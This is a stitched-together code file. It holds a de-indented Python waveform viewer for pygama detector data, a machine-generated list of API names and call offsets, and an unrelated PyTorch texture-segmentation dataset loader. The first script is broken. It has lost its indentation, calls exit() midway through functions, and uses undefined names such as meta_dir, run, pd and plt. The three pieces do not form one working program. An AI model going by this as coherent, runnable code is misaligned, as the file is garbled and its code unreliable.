from matplotlib.colors import LogNorm
import scipy.signal as signal
import argparse
import pdb
import tinydb as db
from pygama import DataSet
from pygama.analysis.calibration import *
from pygama.analysis.histograms import *
import pygama.utils as pgu
from matplotlib.lines import Line2D
from pygama.utils import set_plot_style
set_plot_style("clint")
def main():
"""
mj60 waveform viewer
"""
run_db, cal_db = "runDB.json", "calDB.json"
par = argparse.ArgumentParser(description="waveform viewer for mj60")
arg, st, sf = par.add_argument, "store_true", "store_false"
arg("-ds", nargs='*', action="store", help="load runs for a DS")
arg("-r", "--run", nargs=1, help="load a single run")
arg("-db", "--writeDB", action=st, help="store results in DB")
args = vars(par.parse_args())
# -- declare the DataSet --
if args["ds"]:
ds_lo = int(args["ds"][0])
try:
ds_hi = int(args["ds"][1])
except:
ds_hi = None
ds = DataSet(ds_lo, ds_hi,
md=run_db, cal = cal_db) #,tier_dir=tier_dir)
if args["run"]:
ds = DataSet(run=int(args["run"][0]),
md=run_db, cal=cal_db)
    # Which run number is being analyzed
# run = 249
# run = 214
# run = 204
# run = 278
# working on analysis for the AvsE cut in mj60
# t1df, t2df = chunker(run)
# cutwf, t2cut = cutter(t1df, t2df, run)
# histograms(cutwf, t2cut, run)
# histograms(ds)
drift_correction(ds, ds_lo)
# def histograms(t1df, t2df, run):
def histograms(ds):
t2 = ds.get_t2df()
print(t2.columns)
exit()
t2df = os.path.expandvars('{}/Spectrum_{}.hdf5'.format(meta_dir,run))
t2df = pd.read_hdf(t2df, key="df")
# n = "tslope_savgol"
# n = "current_max"
# n = "tslope_pz"
n = "tail_tau"
# n = "tail_amp"
e = "e_cal"
x = t2df[e]
# y = t2df[n]
y = t2df[n] / x
plt.clf()
# H, xedges, yedges = np.histogram2d(t2df["tail_tau"], t2df["e_ftp"], bins=[2000,200], range=[[0, 6600], [0, 5]])
plt.hist2d(x, y, bins=[1000,200], range=[[0, 200], [0, .001]], norm=LogNorm(), cmap='jet')
# plt.hist2d(x, y, bins=[1000,1000], norm=LogNorm())
# plt.scatter(H[0],H[1])
# f = plt.figure(figsize=(20,5))
# p1 = f.add_subplot(111, title='Test', xlabel='Energy (keV)', ylabel=n)
# h1,xedg1,yedg1 = np.histogram2d(x, y, bins=[1000,200], range=[[0,2000],[0,100]])
# h1 = h1.T
# # hMin, hMax = np.amin(h1), np.amax(h1)
# # im1 = p1.imshow(h1,cmap='jet',vmin=hMin,vmax=hMax, aspect='auto') #norm=LogNorm())
# im1 = p1.imshow(h1,cmap='jet', origin='lower', aspect='auto', norm=LogNorm(), extent=[xedg1[0], xedg1[-1], yedg1[0], yedg1[-1]])
# cb1 = f.colorbar(im1, ax=p1)#, fraction=0.037, pad=0.04)
cbar = plt.colorbar()
# plt.xscale('symlog')
# plt.yscale('symlog')
plt.title("Run {}".format(run))
plt.xlabel("Energy (keV)", ha='right', x=1)
plt.ylabel(n, ha='right', y=1)
# cbar.ax.set_ylabel('Counts')
# plt.ylabel("tslope_savgol", ha='right', y=1)
# plt.ylabel("A/E_ftp", ha='right', y=1)
# plt.tight_layout()
# # plt.savefig('./plots/meeting_plots/run{}_{}_vs_{}.png'.format(run, n, e))
# plt.show()
# xlo, xhi, xpb = 0, 10000, 10
# xP, hP = get_hist(t2df["trap_max"], xlo, xhi, xpb)
#
# plt.plot(xP, hP, ls='steps', lw=1.5, c='m',
# label="pygama trap_max, {} cts".format(sum(hP)))
# plt.xlabel("Energy (uncal)", ha='right', x=1)
# plt.ylabel("Counts", ha='right', y=1)
# plt.legend()
plt.tight_layout()
plt.show()
def chunker(run):
t1df = os.path.expandvars('{}/t1_run{}.h5'.format(tier_dir,run))
t2df = os.path.expandvars('{}/Spectrum_{}.hdf5'.format(meta_dir,run))
t2df = pd.read_hdf(t2df, key="df")
t2df_chunk = t2df[:75000]
key = "/ORSIS3302DecoderForEnergy"
wf_chunk = pd.read_hdf(t1df, key, where="ievt < {}".format(75000))
wf_chunk.reset_index(inplace=True) # required step -- fix pygama "append" bug
t2df = t2df.reset_index(drop=True)
# create waveform block. mask wfs of unequal lengths
icols = []
for idx, col in enumerate(wf_chunk.columns):
if isinstance(col, int):
icols.append(col)
wf_block = wf_chunk[icols].values
# print(wf_block.shape, type(wf_block))
# print(t2df_chunk)
return wf_block, t2df_chunk
def cutter(t1df, t2df, run):
# t2cut = t2df.loc[(t2df.e_cal>3.1099]
t2cut = t2df
print(t2cut.index)
print(t2cut)
cutwf = t1df[t2cut.index]
print(cutwf)
# xvals = np.arange(0,3000)
# start = time.time()
# for i in range(len(t2cut.index)):
# # for i in range(0,5):
# plt.plot(xvals, cutwf[i], lw=1)
# plt.xlabel('Sample Number', ha='right', x=1.0)
# plt.ylabel('ADC Value', ha='right', y=1.0)
# plt.tight_layout()
# plt.show()
return cutwf, t2cut
def drift_correction(ds, ds_lo):
## testing a drift time correction code
# t1df = ds.get_t1df()
# t1df.reset_index(inplace=True)
# t2df = ds.get_t2df()
"""
Take a single DataSet and window it so that the output file only contains
events near an expected peak location.
"""
# a user has to figure out the uncalibrated energy range of the K40 peak
# xlo, xhi, xpb = 0, 2e6, 2000 # show phys. spectrum (top feature is 2615 pk)
# xlo, xhi, xpb = 990000, 1030000, 250 # k40 peak, ds 3
t2df = ds.get_t2df()
calDB = ds.calDB
query = db.Query()
table = calDB.table("cal_pass1")
vals = table.all()
df_cal = pd.DataFrame(vals) # <<---- omg awesome
df_cal = df_cal.loc[df_cal.ds==ds_lo]
p1cal = df_cal.iloc[0]["p1cal"]
cal = p1cal * np.asarray(t2df["e_ftp"])
xlo = 2.46e6
xhi = 2.5e6
    hE, xE = get_hist(t2df["energy"], bins=100, range=(xlo, xhi))
plt.semilogy(xE, hE, ls='steps', lw=1, c='r')
import matplotlib.ticker as ticker
plt.gca().xaxis.set_major_formatter(ticker.FormatStrFormatter('%0.4e'))
plt.locator_params(axis='x', nbins=5)
plt.xlabel("Energy (uncal.)", ha='right', x=1)
plt.ylabel("Counts", ha='right', y=1)
plt.show()
# plt.savefig(f"./plots/cage_ds{ds.ds_lo}_winK40.pdf")
t1df = pd.DataFrame()
for run in ds.paths:
ft1 = ds.paths[run]["t1_path"]
print(f"Scanning ds {ds.ds_lo}, run {run}\n file: {ft1}")
for chunk in pd.read_hdf(ft1, 'ORSIS3302DecoderForEnergy', chunksize=5e4):
t1df_win = chunk.loc[(chunk.energy > xlo) & (chunk.energy < xhi)]
print(t1df_win.shape)
t1df = pd.concat([t1df, t1df_win], ignore_index=True)
print('It worked? maybe?')
h5_opts = {
"mode":"w", # overwrite existing
"append":False,
"format":"table",
# "complib":"blosc:zlib", # no compression, increases I/O speed
# "complevel":1,
# "data_columns":["ievt"]
}
t1df.reset_index(inplace=True)
t1df.to_hdf('./test_dt_file.h5', key="df_windowed", **h5_opts)
print("wrote file")
exit()
# key = "/ORSIS3302DecoderForEnergy"
# wf_chunk = pd.read_hdf(t1df, key, where="ievt < {}".format(75000))
# wf_chunk.reset_index(inplace=True) # required step -- fix pygama "append" bug
t2df = t2df.reset_index(drop=True)
# create waveform block. mask wfs of unequal lengths
number = 20000
icols = []
for idx, col in enumerate(t1df.columns):
if isinstance(col, int):
icols.append(col)
wfs = t1df[icols].values
wfs = np.asarray(wfs)
# wfs = wfs[:number]
# t2df_chunk = t2df[:number]
# print(wf_block.shape, type(wf_block))
# print(t2df_chunk)
t0 = np.asarray(t2df['t0'])
energy = np.asarray(t2df['e_ftp'])
# energy = 0.4066852222964447 * energy
baseline = wfs[:, 0:500]
avg_bl = []
for i in range(len(wfs)):
avg_bl.append(np.mean(baseline[i], keepdims=True))
avg_bl = np.asarray(avg_bl)
wfs = np.asarray(wfs)
wfs = wfs - avg_bl
clk = 100e6
decay = 78
wfs = pz(wfs, decay, clk)
t100 = []
t0_raw = []
wf_raw = []
e_raw = []
for i in range(len(wfs)):
t100_t = np.where(wfs[i] > energy[i])
t100_t = t100_t[0]
if len(t100_t) > 0:
t100_t = t100_t[0]
t100.append(t100_t)
t0_raw.append(t0[i])
wf_raw.append(wfs[i])
e_raw.append(energy[i])
e_raw = np.asarray(e_raw)
index = np.where(e_raw < 7300)[0]
t100 = np.asarray(t100)
t0_raw = np.asarray(t0_raw)
wf_raw = np.asarray(wf_raw)
e_raw = e_raw[index]
t100 = t100[index]
t0_raw = t0_raw[index]
wf_raw = wf_raw[index]
e_raw = 0.4066852222964447 * e_raw
wf_raw = 0.4066852222964447 * wf_raw
hist, bins = np.histogram(e_raw, bins=2700, range=[0,2700])
b = (bins[:-1] + bins[1:]) / 2
plt.plot(b, hist, ls="steps", color='black')
plt.tight_layout()
plt.show()
plt.clf()
# xvals = np.arange(0,3000)
# start = time.time()
# for i in range(len(t100)):
#
# plt.plot(xvals, wf_raw[i], lw=1)
# plt.vlines(t0_raw[i], np.amin(wf_raw[i]), e_raw[i], color='r', linewidth=1.5, label='t0')
# plt.vlines(t100[i], np.amin(wf_raw[i]), e_raw[i], color='g', linewidth=1.5, label='t100')
# plt.hlines(e_raw[i], t0_raw[i], 3000, color='k', linewidth=1.5, zorder=10, label='e_ftp')
# plt.xlabel('Sample Number', ha='right', x=1.0)
# plt.ylabel('ADC Value', ha='right', y=1.0)
# plt.legend()
# plt.tight_layout()
# plt.show()
# exit()
"""
a1 = (t100 - t0_raw) * e_raw
a_wf = []
for i in range(len(wf_raw)):
a2 = sum(wf_raw[i,t0[i]:t100[i]])
a_wf.append(a2)
a_drift = a1 - a_wf
# a_drift = a_drift.tolist()
# print(a_drift)
# exit()
a_test = a_drift[np.where((e_raw > 2600) & (e_raw < 2630))]
e_test = e_raw[np.where((e_raw > 2600) & (e_raw < 2630))]
plt.hist2d(e_test, a_test, bins=[30,100], range=[[2600, 2630], [0, np.amax(a_test)]], norm=LogNorm(), cmap='jet')
cbar = plt.colorbar()
cbar.ax.set_ylabel('Counts')
plt.tight_layout()
plt.show()
exit()
"""
xvals = np.arange(0,3000)
start = time.time()
for i in range(0,number):
# for i in range(0,5):
plt.plot(xvals, wfs[i], lw=1)
plt.vlines(t0[i], np.amin(wfs[i]), energy[i], color='r', linewidth=1.5, label='t0')
plt.vlines(t100[i], np.amin(wfs[i]), energy[i], color='g', linewidth=1.5, label='t100')
plt.hlines(energy[i], t0[i], 3000, color='k', linewidth=1.5, zorder=10, label='e_ftp')
plt.xlabel('Sample Number', ha='right', x=1.0)
plt.ylabel('ADC Value', ha='right', y=1.0)
plt.legend()
plt.tight_layout()
plt.show()
# input:
# fsignal: PZ-corrected and INL-corrected signal of length len, from channel chan
# Dets: MJ detector info data structure
# PSA: contains filter params to use for trapezoids
# CTC_factor: the value used in the correction, usually CTC.e_dt_slope[chan]
# outputs:
# returned value: energy in keV, or -1.0f in case of error
# t0: start time of drift/signal
# e_adc: energy in ADC units
# e_raw: uncorrected energy in 0.001 ADC units
# drift: charge trapping value (drift time * charge)
# to be used for optimizing correction, in ADC units
# CTC correction = drift*ctc_factor[chan]
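# Hedged illustration of the charge-trapping correction (CTC) described above.
# The helper below is NOT part of pygama; its name and the linear form are
# assumptions based only on the comment "CTC correction = drift*ctc_factor[chan]".
def ctc_correct_sketch(e_raw, drift, ctc_factor):
    """Apply a linear charge-trapping correction: events with a larger
    drift value (drift time * charge) get a proportionally larger energy boost."""
    return e_raw + drift * ctc_factor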
def pz(wfs, decay, clk):
"""
pole-zero correct a waveform
decay is in us, clk is in Hz
"""
# get linear filter parameters, in units of [clock ticks]
dt = decay * (1e10 / clk)
rc = 1 / np.exp(1 / dt)
num, den = [1, -1], [1, -rc]
# reversing num and den does the inverse transform (ie, PZ corrects)
pz_wfs = signal.lfilter(den, num, wfs)
return pz_wfs
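# Hedged usage sketch for pz(), repeating the values already used above:
#   wfs_pz = pz(wfs, decay=78, clk=100e6)
# With a 100 MHz clock the 78 us decay constant corresponds to ~7800 samples, and
# the inverted single-pole filter flattens the exponential tails before the
# t0/t100 drift-time estimate.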
# return wfs, t2df_chunk
if __name__=="__main__":
main()
|
[
"argparse.ArgumentParser",
"numpy.amin",
"matplotlib.pyplot.clf",
"numpy.histogram",
"matplotlib.colors.LogNorm",
"numpy.arange",
"numpy.exp",
"numpy.mean",
"matplotlib.pyplot.gca",
"matplotlib.pyplot.tight_layout",
"matplotlib.pyplot.hlines",
"pandas.DataFrame",
"matplotlib.pyplot.locator_params",
"pandas.read_hdf",
"scipy.signal.lfilter",
"matplotlib.pyplot.colorbar",
"matplotlib.ticker.FormatStrFormatter",
"matplotlib.pyplot.semilogy",
"pandas.concat",
"pygama.DataSet",
"matplotlib.pyplot.show",
"pygama.utils.set_plot_style",
"numpy.asarray",
"matplotlib.pyplot.legend",
"tinydb.Query",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.plot",
"time.time",
"numpy.where",
"matplotlib.pyplot.xlabel"
] |
[((532, 555), 'pygama.utils.set_plot_style', 'set_plot_style', (['"""clint"""'], {}), "('clint')\n", (546, 555), False, 'from pygama.utils import set_plot_style\n'), ((669, 732), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""waveform viewer for mj60"""'}), "(description='waveform viewer for mj60')\n", (692, 732), False, 'import argparse\n'), ((1945, 1972), 'pandas.read_hdf', 'pd.read_hdf', (['t2df'], {'key': '"""df"""'}), "(t2df, key='df')\n", (1956, 1972), True, 'import pandas as pd\n'), ((2164, 2173), 'matplotlib.pyplot.clf', 'plt.clf', ([], {}), '()\n', (2171, 2173), True, 'import matplotlib.pyplot as plt\n'), ((3039, 3053), 'matplotlib.pyplot.colorbar', 'plt.colorbar', ([], {}), '()\n', (3051, 3053), True, 'import matplotlib.pyplot as plt\n'), ((3150, 3193), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Energy (keV)"""'], {'ha': '"""right"""', 'x': '(1)'}), "('Energy (keV)', ha='right', x=1)\n", (3160, 3193), True, 'import matplotlib.pyplot as plt\n'), ((3198, 3228), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['n'], {'ha': '"""right"""', 'y': '(1)'}), "(n, ha='right', y=1)\n", (3208, 3228), True, 'import matplotlib.pyplot as plt\n'), ((3816, 3834), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (3832, 3834), True, 'import matplotlib.pyplot as plt\n'), ((3839, 3849), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (3847, 3849), True, 'import matplotlib.pyplot as plt\n'), ((4024, 4051), 'pandas.read_hdf', 'pd.read_hdf', (['t2df'], {'key': '"""df"""'}), "(t2df, key='df')\n", (4035, 4051), True, 'import pandas as pd\n'), ((5760, 5770), 'tinydb.Query', 'db.Query', ([], {}), '()\n', (5768, 5770), True, 'import tinydb as db\n'), ((5844, 5862), 'pandas.DataFrame', 'pd.DataFrame', (['vals'], {}), '(vals)\n', (5856, 5862), True, 'import pandas as pd\n'), ((6114, 6159), 'matplotlib.pyplot.semilogy', 'plt.semilogy', (['xE', 'hE'], {'ls': '"""steps"""', 'lw': '(1)', 'c': '"""r"""'}), "(xE, hE, ls='steps', lw=1, c='r')\n", (6126, 6159), True, 'import matplotlib.pyplot as plt\n'), ((6280, 6317), 'matplotlib.pyplot.locator_params', 'plt.locator_params', ([], {'axis': '"""x"""', 'nbins': '(5)'}), "(axis='x', nbins=5)\n", (6298, 6317), True, 'import matplotlib.pyplot as plt\n'), ((6323, 6369), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Energy (uncal.)"""'], {'ha': '"""right"""', 'x': '(1)'}), "('Energy (uncal.)', ha='right', x=1)\n", (6333, 6369), True, 'import matplotlib.pyplot as plt\n'), ((6374, 6411), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Counts"""'], {'ha': '"""right"""', 'y': '(1)'}), "('Counts', ha='right', y=1)\n", (6384, 6411), True, 'import matplotlib.pyplot as plt\n'), ((6416, 6426), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (6424, 6426), True, 'import matplotlib.pyplot as plt\n'), ((6498, 6512), 'pandas.DataFrame', 'pd.DataFrame', ([], {}), '()\n', (6510, 6512), True, 'import pandas as pd\n'), ((7804, 7819), 'numpy.asarray', 'np.asarray', (['wfs'], {}), '(wfs)\n', (7814, 7819), True, 'import numpy as np\n'), ((7957, 7979), 'numpy.asarray', 'np.asarray', (["t2df['t0']"], {}), "(t2df['t0'])\n", (7967, 7979), True, 'import numpy as np\n'), ((7993, 8018), 'numpy.asarray', 'np.asarray', (["t2df['e_ftp']"], {}), "(t2df['e_ftp'])\n", (8003, 8018), True, 'import numpy as np\n'), ((8210, 8228), 'numpy.asarray', 'np.asarray', (['avg_bl'], {}), '(avg_bl)\n', (8220, 8228), True, 'import numpy as np\n'), ((8239, 8254), 'numpy.asarray', 'np.asarray', (['wfs'], {}), '(wfs)\n', (8249, 8254), True, 'import numpy 
as np\n'), ((8714, 8731), 'numpy.asarray', 'np.asarray', (['e_raw'], {}), '(e_raw)\n', (8724, 8731), True, 'import numpy as np\n'), ((8781, 8797), 'numpy.asarray', 'np.asarray', (['t100'], {}), '(t100)\n', (8791, 8797), True, 'import numpy as np\n'), ((8811, 8829), 'numpy.asarray', 'np.asarray', (['t0_raw'], {}), '(t0_raw)\n', (8821, 8829), True, 'import numpy as np\n'), ((8843, 8861), 'numpy.asarray', 'np.asarray', (['wf_raw'], {}), '(wf_raw)\n', (8853, 8861), True, 'import numpy as np\n'), ((9064, 9111), 'numpy.histogram', 'np.histogram', (['e_raw'], {'bins': '(2700)', 'range': '[0, 2700]'}), '(e_raw, bins=2700, range=[0, 2700])\n', (9076, 9111), True, 'import numpy as np\n'), ((9150, 9194), 'matplotlib.pyplot.plot', 'plt.plot', (['b', 'hist'], {'ls': '"""steps"""', 'color': '"""black"""'}), "(b, hist, ls='steps', color='black')\n", (9158, 9194), True, 'import matplotlib.pyplot as plt\n'), ((9199, 9217), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (9215, 9217), True, 'import matplotlib.pyplot as plt\n'), ((9222, 9232), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (9230, 9232), True, 'import matplotlib.pyplot as plt\n'), ((9237, 9246), 'matplotlib.pyplot.clf', 'plt.clf', ([], {}), '()\n', (9244, 9246), True, 'import matplotlib.pyplot as plt\n'), ((10580, 10598), 'numpy.arange', 'np.arange', (['(0)', '(3000)'], {}), '(0, 3000)\n', (10589, 10598), True, 'import numpy as np\n'), ((10610, 10621), 'time.time', 'time.time', ([], {}), '()\n', (10619, 10621), False, 'import os, time, json\n'), ((12204, 12233), 'scipy.signal.lfilter', 'signal.lfilter', (['den', 'num', 'wfs'], {}), '(den, num, wfs)\n', (12218, 12233), True, 'import scipy.signal as signal\n'), ((1218, 1262), 'pygama.DataSet', 'DataSet', (['ds_lo', 'ds_hi'], {'md': 'run_db', 'cal': 'cal_db'}), '(ds_lo, ds_hi, md=run_db, cal=cal_db)\n', (1225, 1262), False, 'from pygama import DataSet\n'), ((5980, 6005), 'numpy.asarray', 'np.asarray', (["t2df['e_ftp']"], {}), "(t2df['e_ftp'])\n", (5990, 6005), True, 'import numpy as np\n'), ((6240, 6274), 'matplotlib.ticker.FormatStrFormatter', 'ticker.FormatStrFormatter', (['"""%0.4e"""'], {}), "('%0.4e')\n", (6265, 6274), True, 'import matplotlib.ticker as ticker\n'), ((6667, 6731), 'pandas.read_hdf', 'pd.read_hdf', (['ft1', '"""ORSIS3302DecoderForEnergy"""'], {'chunksize': '(50000.0)'}), "(ft1, 'ORSIS3302DecoderForEnergy', chunksize=50000.0)\n", (6678, 6731), True, 'import pandas as pd\n'), ((8451, 8479), 'numpy.where', 'np.where', (['(wfs[i] > energy[i])'], {}), '(wfs[i] > energy[i])\n', (8459, 8479), True, 'import numpy as np\n'), ((8744, 8766), 'numpy.where', 'np.where', (['(e_raw < 7300)'], {}), '(e_raw < 7300)\n', (8752, 8766), True, 'import numpy as np\n'), ((10687, 10716), 'matplotlib.pyplot.plot', 'plt.plot', (['xvals', 'wfs[i]'], {'lw': '(1)'}), '(xvals, wfs[i], lw=1)\n', (10695, 10716), True, 'import matplotlib.pyplot as plt\n'), ((10913, 11003), 'matplotlib.pyplot.hlines', 'plt.hlines', (['energy[i]', 't0[i]', '(3000)'], {'color': '"""k"""', 'linewidth': '(1.5)', 'zorder': '(10)', 'label': '"""e_ftp"""'}), "(energy[i], t0[i], 3000, color='k', linewidth=1.5, zorder=10,\n label='e_ftp')\n", (10923, 11003), True, 'import matplotlib.pyplot as plt\n'), ((11008, 11054), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Sample Number"""'], {'ha': '"""right"""', 'x': '(1.0)'}), "('Sample Number', ha='right', x=1.0)\n", (11018, 11054), True, 'import matplotlib.pyplot as plt\n'), ((11063, 11105), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""ADC Value"""'], 
{'ha': '"""right"""', 'y': '(1.0)'}), "('ADC Value', ha='right', y=1.0)\n", (11073, 11105), True, 'import matplotlib.pyplot as plt\n'), ((11114, 11126), 'matplotlib.pyplot.legend', 'plt.legend', ([], {}), '()\n', (11124, 11126), True, 'import matplotlib.pyplot as plt\n'), ((11135, 11153), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (11151, 11153), True, 'import matplotlib.pyplot as plt\n'), ((11162, 11172), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (11170, 11172), True, 'import matplotlib.pyplot as plt\n'), ((12069, 12083), 'numpy.exp', 'np.exp', (['(1 / dt)'], {}), '(1 / dt)\n', (12075, 12083), True, 'import numpy as np\n'), ((2364, 2373), 'matplotlib.colors.LogNorm', 'LogNorm', ([], {}), '()\n', (2371, 2373), False, 'from matplotlib.colors import LogNorm\n'), ((6860, 6906), 'pandas.concat', 'pd.concat', (['[t1df, t1df_win]'], {'ignore_index': '(True)'}), '([t1df, t1df_win], ignore_index=True)\n', (6869, 6906), True, 'import pandas as pd\n'), ((8160, 8195), 'numpy.mean', 'np.mean', (['baseline[i]'], {'keepdims': '(True)'}), '(baseline[i], keepdims=True)\n', (8167, 8195), True, 'import numpy as np\n'), ((10743, 10758), 'numpy.amin', 'np.amin', (['wfs[i]'], {}), '(wfs[i])\n', (10750, 10758), True, 'import numpy as np\n'), ((10837, 10852), 'numpy.amin', 'np.amin', (['wfs[i]'], {}), '(wfs[i])\n', (10844, 10852), True, 'import numpy as np\n'), ((6204, 6213), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (6211, 6213), True, 'import matplotlib.pyplot as plt\n')]
|
import numpy as np
import torch
import torchvision.transforms as transforms
import torch.utils.data as data
import os
import pickle
import numpy as np
import nltk
from PIL import Image
import cv2
import glob
import random
# deprecated
# def get_data_direct(img_size, texture_size,
# imgs_fn = None, textures_fn = None, sample_dir = None, sep = ':', format = '*.png',
# mean = [0.485, 0.456, 0.406], std = [0.229, 0.224, 0.225]):
# if sample_dir is None:
# imgs_fn = imgs_fn.split(sep)
# textures_fn = textures_fn.split(sep)
# else:
# all_images = glob.glob(os.path.join(sample_dir, format))
# all_images = sorted(all_images)
# imgs_fn = []
# textures_fn = []
# for file in all_images:
# if 'img' in file.split('/')[-1]:
# imgs_fn.append(file)
# elif 'texture' in file.split('/')[-1]:
# textures_fn.append(file)
# else:
# raise ValueError('not sure which type if this one: %s'%(file))
# batch_size = len(imgs_fn)
# assert len(imgs_fn) == len(textures_fn)
# imgs = []
# textures = []
# for index in range(batch_size):
# img_cur = Image.open(imgs_fn[index])
# img_cur = img_cur.resize([img_size, img_size])
# # it could be rgba
# img_cur = (np.asarray(img_cur)[...,:3] / 255.0 - mean) / std
# imgs.append(img_cur)
#
# texture_cur = Image.open(textures_fn[index])
# texture_cur = texture_cur.resize([texture_size, texture_size])
# # it could be rgba
# texture_cur = (np.asarray(texture_cur)[...,:3] / 255.0 - mean) / std
# textures.append(texture_cur)
#
# imgs = np.array(imgs).reshape([batch_size, img_size, img_size, 3])
# textures = np.array(textures).reshape([batch_size, texture_size, texture_size, 3])
# imgs = np.transpose(imgs, [0, 3, 1, 2])
# textures = np.transpose(textures, [0, 3, 1, 2])
# return imgs, textures
#
def get_data_direct(img_size, imgs_dir, texture_size = None, textures_dir = None,
format = '*.png',
mean = [0.485, 0.456, 0.406], std = [0.229, 0.224, 0.225]):
imgs = glob.glob(os.path.join(imgs_dir, format))
imgs = sorted(imgs)
if textures_dir is not None:
textures = glob.glob(os.path.join(textures_dir, format))
textures = sorted(textures)
batch_size = len(imgs) * len(textures) if textures_dir is not None else len(imgs)
imgs_data = []
textures_data = []
if textures_dir is not None:
assert texture_size is not None
for img_index in range(len(imgs)):
for texture_index in range(len(textures)):
img_cur = Image.open(imgs[img_index])
img_cur = img_cur.resize([img_size, img_size])
# it could be rgba
img_cur = (np.asarray(img_cur)[...,:3] / 255.0 - mean) / std
imgs_data.append(img_cur)
texture_cur = Image.open(textures[texture_index])
texture_cur = texture_cur.resize([texture_size, texture_size])
# it could be rgba
texture_cur = (np.asarray(texture_cur)[...,:3] / 255.0 - mean) / std
textures_data.append(texture_cur)
else:
for img_index in range(len(imgs)):
img_cur = Image.open(imgs[img_index])
img_cur = img_cur.resize([img_size, img_size])
# it could be rgba
img_cur = (np.asarray(img_cur)[...,:3] / 255.0 - mean) / std
imgs_data.append(img_cur)
imgs_data = np.array(imgs_data).reshape([batch_size, img_size, img_size, 3])
imgs_data = np.transpose(imgs_data, [0, 3, 1, 2])
if textures_dir is not None:
textures_data = np.array(textures_data).reshape([batch_size, texture_size, texture_size, 3])
textures_data = np.transpose(textures_data, [0, 3, 1, 2])
return imgs_data, textures_data
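# Hedged usage sketch for get_data_direct(); the directory names are placeholders,
# not paths from this project:
#   imgs, textures = get_data_direct(256, './samples/imgs',
#                                    texture_size=64, textures_dir='./samples/textures')
# Both arrays come back ImageNet-normalized and transposed to NCHW
# ([batch, 3, H, W]), with batch = n_images * n_textures when textures_dir is given.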
class texture_seg_dataset(object):
def __init__(self, data_path, img_size, segmentation_regions, texture_size,
shuffle = True, use_same_from = True,
mean = [0.485, 0.456, 0.406], std = [0.229, 0.224, 0.225]): # from torch normalize
self.shuffle = shuffle
self.img_size = img_size
self.segmentation_regions = segmentation_regions
self.texture_size = texture_size
self.folders = glob.glob(os.path.join(data_path, '*/'))
self.use_same_from = use_same_from
self.mean = mean
self.std = std
        # segmentation_regions must not exceed the number of texture folders
assert (len(self.folders) >= self.segmentation_regions)
def generate_random_masks(self, points = None):
# use batch_size = 1
# return [size, size, segmentation_regions]
batch_size = 1
xs, ys = np.meshgrid(np.arange(0, self.img_size), np.arange(0, self.img_size))
if points is None:
n_points = [self.segmentation_regions]
points = [np.random.randint(0, self.img_size, size=(n_points[i], 2)) for i in range(batch_size)]
masks = []
for b in range(batch_size):
dists_b = [np.sqrt((xs - p[0])**2 + (ys - p[1])**2) for p in points[b]]
voronoi = np.argmin(dists_b, axis=0)
masks_b = np.zeros((self.img_size, self.img_size, self.segmentation_regions))
for m in range(self.segmentation_regions):
masks_b[:,:,m][voronoi == m] = 1
masks.append(masks_b)
return masks[0]
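    # Note: the masks built above form a Voronoi partition of the image; each pixel
    # is assigned to its nearest random seed point, so the `segmentation_regions`
    # binary masks are disjoint and sum to 1 at every pixel.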
def random_crop(self, image, crop_height, crop_width):
if (crop_width <= image.shape[1]) and (crop_height <= image.shape[0]):
x = np.random.randint(0, image.shape[1]-crop_width)
y = np.random.randint(0, image.shape[0]-crop_height)
return image[y:y+crop_height, x:x+crop_width, :]
else:
raise Exception('Crop shape exceeds image dimensions!')
def get_data(self, format = '*.jpg'):
mask = self.generate_random_masks()
choose_from = []
img = np.zeros([self.img_size, self.img_size, 3])
sampled_folders = random.sample(self.folders, self.segmentation_regions)
texture_mask = []
for index, folder in enumerate(sampled_folders):
files = glob.glob(os.path.join(folder, format))
file_cur = random.choice(files)
# print (file_cur)
img_cur = Image.open(file_cur)
img_cur = img_cur.resize([self.img_size, self.img_size])
img_cur = (np.asarray(img_cur) / 255.0 - self.mean) / self.std
img[mask[..., index] == 1] = img_cur[mask[..., index] == 1]
if self.use_same_from:
texture_cur = img_cur
else:
file_cur = random.choice(files)
texture_cur = np.asarray(Image.open(file_cur))
texture = self.random_crop(texture_cur, self.texture_size, self.texture_size)
texture_mask.append({'mask': mask[...,index], 'texture':texture})
return img, texture_mask
def feed(self, batch_size = None):
if batch_size is None:
return self.get_data()
else:
img_texture_mask = []
            # add all in one img input
# for _ in range(batch_size // self.segmentation_regions + 1):
# img, texture_mask = self.get_data()
# for index in range(self.segmentation_regions):
# patch = {}
# patch['img'] = img
# patch['texture'] = texture_mask[index]['texture']
# patch['mask'] = texture_mask[index]['mask']
# img_texture_mask.append(patch)
            # add each one separately
for _ in range(batch_size):
img, texture_mask = self.get_data()
# random choice one from cluster
index = np.random.choice(self.segmentation_regions, 1)[0]
patch = {}
patch['img'] = img
patch['texture'] = texture_mask[index]['texture']
patch['mask'] = texture_mask[index]['mask']
img_texture_mask.append(patch)
img_texture_mask = img_texture_mask[:batch_size]
if self.shuffle:
random.shuffle(img_texture_mask)
imgs = [item['img'] for item in img_texture_mask]
textures = [item['texture'] for item in img_texture_mask]
masks = [item['mask'] for item in img_texture_mask]
imgs = np.array(imgs).reshape([batch_size, self.img_size, self.img_size, 3])
textures = np.array(textures).reshape([batch_size, self.texture_size, self.texture_size, 3])
masks = np.array(masks).reshape([batch_size, self.img_size, self.img_size, 1])
imgs = np.transpose(imgs, [0, 3, 1, 2])
textures = np.transpose(textures, [0, 3, 1, 2])
masks = np.transpose(masks, [0, 3, 1, 2])
return imgs, textures, masks
if __name__ == '__main__':
data_set = texture_seg_dataset('./dataset/dtd/images', img_size = 256, segmentation_regions= 3, texture_size = 64)
